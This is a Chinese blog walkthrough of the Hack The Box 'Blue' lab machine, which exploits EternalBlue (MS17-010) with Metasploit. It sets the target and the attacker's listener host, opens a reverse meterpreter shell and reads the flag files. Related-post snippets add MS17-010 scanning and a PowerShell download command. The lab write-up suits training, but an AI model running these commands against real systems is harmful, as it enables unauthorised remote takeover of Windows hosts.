hack the box blue靶机

最新推荐文章于 2024-10-13 22:00:32 发布
最新推荐文章于 2024-10-13 22:00:32 发布
阅读量1.3k 收藏
点赞数
分类专栏: heck the box 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zr1213159840/article/details/124202420
版权

靶机名字叫blue,提示的漏洞编号是cve-2017-0144。这是永恒之蓝漏洞(EternalBlue)。
在这里插入图片描述
扫描一下,能发现打开了445等端口。有很多smb的信息。

nmap -sV -Pn -A 10.10.10.40

在这里插入图片描述
既然都知道是永恒之蓝了,直接利用吧,启动msf,然后搜索一下blue相关的。

search blue

在这里插入图片描述
第14个是RCE,我们选择

use 14

使用options看下需要配置哪些东西
在这里插入图片描述需要配置远程主机,远程端口(已默认),本地主机。配置完成后直接RUN

set RHOSTS 10.10.10.40
set LHOST 10.10.14.30
run

在这里插入图片描述
进入meterpreter后,进入shell

shell

在Users/Administrator/Desktop下面能找到root.txt,直接读取

type root.txt

在这里插入图片描述
在Users/hairs/Desktop文件夹下面有一个user.txt,直接type读取即可
在这里插入图片描述

铁锤2号
关注
专栏目录
Hack The BoxBlue靶场
知柯信安
11-25 1380
Blue(蓝盒子) 欢迎订阅蓝色退休盒子! 这是另外一个简单的盒子,非常适合新人们熟悉nmap结果和使用metasploit。我启动这个盒子就像启动任何盒子一样,nmap扫描! 第一次扫描实际上只是用来查看目标主机上已打开并正在运行的内容。看一下,我们只看到3个服务和一堆端口打开。msrpc,netbios-ssn和microsoft-ds。如果这是您第一次入侵Windows计算机,您将经常看到这些服务。您将需要知道这些服务是什么。 MS-RPC是RPC协议的Microsoft实现。它曾经/仍然被用来制
hackthebox-Blue(考点:smb 蓝)不用msf
冬萍子癸水
04-09 711
这个机子用msf做很快。针对oscp备考者,这篇文章不用msf。 nmap 没啥其他端口,就是smb。用我们对smb常用的扫描方法 nmap -p 445 --script vuln 10.10.10.40 提示这台ms17-010 是有漏洞的。 searchsploit ms17-010 有好多,最后选择倒数第二个 42315.py 先准备好这个脚本要传的弹shell的exe。 msf...
Hack the box靶机 Blue
菜浪马废的博客
05-27 269
开放445端口 扫描 ms17010漏洞可用 msf登场 简单 我决定先把简单的win做了 然后由简入深 慢慢学习 31号我觉得应该能把htb的win打完 加油!
HackTheBox-Windows-Blue #Windows
weixin_39974634的博客
12-08 147
Blue虽然可能是黑客盒子上最简单的机器,但它证明了EternalBlue漏洞的严重性,自公开泄露以来,该漏洞已被用于多次大规模勒索软件和加密挖矿攻击。时,这意味着你当前正在以系统级别的权限执行操作。这通常意味着你可以访问和控制计算机上的所有资源,包括文件、注册表和其他系统设置。smb version scanner 扫描显示是win7 Pro SP1,ms17-010的攻击对象。nmap扫描 -F fewer port than default scan。五个share 3个$隐藏share。
Hack The Box】windows练习-- blue
人间体佐菲的博客
10-30 413
Hack The Box】windows练习-- blue
HTB靶场系列 Windows靶机 Blue靶机
程序员阿飘 的博客
01-10 479
本文已参与「新人创作礼」活动,一起开启掘金创作之路ms17-010漏洞,也就是广为人知的永恒之蓝,非常简单的一个靶机,因为几乎不用提权,ms17-010漏洞使用成功获取的就是system级别的权限。
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
[Hack The Box] 靶机1 Meow+Paper
Huamang的博客
03-24 1824
前言 久闻HTB平台大名,这里不需要下载镜像自己打了,可以直接在网上开好镜像,连上vpn直接干 这次就算是对这个平台的一个熟悉操作吧 Meow 下载到了open文件,kali连接上 然后测试一下可以ping通了 然后就开nmap跑 nmap -sV 10.129.160.90 开启了23端口,telnet服务,直接连接,root账户 直接拿flag 这个算是白给的 Paper 下面就开始打正式的靶机了 一开始开启靶机ping不通,发现Starting Point和Machines居然不是用的一个
HackTheBox YUMMY靶机渗透实录
最新发布
qq_36129581的博客
10-13 1039
有22端口和80端口,22端口应该暂时用不到。80端口是http服务,可以访问看看有没有突破口。看到这个网页,能交互的都点一下,发现有个预定桌席可以交互,点进去,提交一个预定,然后进面板中,点击保存日历,发现可以下载到文件,这时想到可能可以下载到系统文件。那我们就可以借助这个操作来修改请求来请求文件。这时打开burp软件拦截网页的请求。点击save按键,查看拦截的请求。这个包没什么问题直接forward。
永恒之蓝漏洞扫描工具官方版
08-06
可以批量扫描局域网内存在永恒之蓝漏洞的工具,比某安工具强大N倍
win7 32 phpstudy vmtool dvwa.vmx.txt
06-09
win7DVWA 靶机镜像 已安装 vmtools
[Hack The Box]靶机8 Optimum
Huamang的博客
04-01 492
nmap直接开漏扫,发现cve-2011-3192,没啥用,开了80端口,去看看 打开是HFS,nmap扫出来是HFS2.3 这个版本的HFS是有cve的 https://nvd.nist.gov/vuln/detail/CVE-2014-6287 msf有这个模块 直接拿下shell 拿到user.txt 进不了admin,需要提权 本地起一个python服务,把winpeas传上去 powershell -c "(new-object System.Net.WebClient).Dow.
Hackthebox walkthrough - Legacy(考点:smb利用 blue
冬萍子癸水
04-27 635
namp走起可见又是smb。但这次没有像LAME靶机那样直接显示版本号。 于是nmap -p 445 --script vuln 10.10.10.4走一波。用NMAP的脚本扫端口 ok显示 ms08-067是个突破点 上msf,search ms08-067, use exploit/windows/smb/ms08_067_netapi , options, set rhost 10.10...
Hack the box -- 靶机渗透测试(TIER1)
wjishuxiaobai的博客
06-22 1513
本文针对Hack the box 靶机TIER1渗透过程进行记录。开启在线靶机靶机IP为10.129.208.78。2.SQL注入 浏览器输入靶机IP10.129.208.78,页面如下。发现是个登录界面,首先尝试常见密码登录如root:root admin:admin administrator:password,登录失败。 随即尝试SQL注入,用户名输入admin‘#,密码输入 123(可随意输入)。成功登录。 Flag 成功获取开启在线靶机靶机IP为10.129.246.195。开启在线靶机,靶
永恒之蓝靶场
m0_46412408的博客
08-13 2000
模拟永恒之蓝攻击过程的话,需要win7(靶机)处于登录状态,来获取用户名和密码从而达到远程控制的目的,模拟hack已经打入内网与靶机处于同一网段(所以用ipcongfig来查看网关信息)输入run/exploit执行攻击(这个过程需要多等一会儿,如果这里出现问题去看看靶机的防火墙是不是开启了,把防火墙关闭再运行一下就好了)address 192.168.1.53 //配置eth0的固定IP地址,网段要和物理机的一样,且此IP未被使用。设置攻击主机的ip地址,显示配置信息。............
永恒之蓝(ms17_010)漏洞复现
m0_50317371的博客
12-08 711
一、永恒之蓝简介 ​永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代
Windows靶机永恒之蓝MS17-010漏洞复现
Stubborn_Lanmail的博客
05-13 2313
实验目标 扫描windows靶机漏洞,并使用MSF框架利用漏洞攻击靶机,最后成功获得靶机的控制权 实验环境 攻击机:kali 2020.3 (IP地址:192.168.146.147) 靶机:metasploitable3-win2k8r2(win2008,IP地址:192.168.146.145) 实验步骤 一、利用Nessus工具扫描靶机漏洞 在kali上安装Nessus 从官网上直接下载安装包安装即可(注意版本) Nessus官网地址:https://www.tenable.com 点击右上角“Ne
MSTables3靶机渗透测试(3)- MS17-010永恒之蓝
reqian23
02-27 929
配置防火墙将相应的“阻塞端口安全策略”-- Disabled 查看全部关于ms17-010模块 msf6 > search ms17-010 对目标进行扫描 msf6 auxiliary(admin/smb/ms17_010_command) > use auxiliary/admin/smb/ms17_010_command msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.118.4 rho.
hack the box three
07-28
- *1* [Hackthebox Three](https://blog.csdn.net/lixiangshidie/article/details/128482447)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值